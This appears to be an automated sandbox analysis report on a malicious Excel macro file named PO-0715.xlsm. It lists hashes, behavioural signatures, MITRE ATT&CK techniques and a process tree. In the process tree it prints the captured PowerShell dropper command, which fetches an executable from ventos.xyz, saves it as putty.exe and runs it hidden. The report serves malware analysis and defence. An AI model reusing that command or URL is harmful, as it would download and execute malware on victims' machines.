dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4

General

Target

PO-0715.xlsm
Size

92KB
MD5

d89a828241cd67ebdc96a905e5924f24
SHA1

90ef404e139164b266d553a5e094b01c0e810b4f
SHA256

dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4
SHA512

7b83617ed1b56eb3181ddf2a7bd9b9122eae6844cf881312fb2f8c1dc1cf62d92ac2a48b841235978d4f68ea59417009e85095eaabb97859b5e67989e86df6c5

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://ventos.xyz/hen.exe

Signatures

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE
2892	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2892	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1164	2892	powershell.exe	66

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2892 wrote to memory of 1164	2892	EXCEL.EXE	71
PID 2892 wrote to memory of 1164	2892	EXCEL.EXE	71
PID 1164 wrote to memory of 2216	1164	powershell.exe	74
PID 1164 wrote to memory of 2216	1164	powershell.exe	74
PID 1164 wrote to memory of 2216	1164	powershell.exe	74

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	2216	putty.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1164	powershell.exe
1164	powershell.exe
1164	powershell.exe
2216	putty.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
11	1164	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2216	putty.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-0715.xlsm"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
PID:2892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ventos.xyz/hen.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  PID:1164
- - C:\Users\Admin\AppData\Local\Temp\putty.exe
    "C:\Users\Admin\AppData\Local\Temp\putty.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Executes dropped EXE
    PID:2216

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads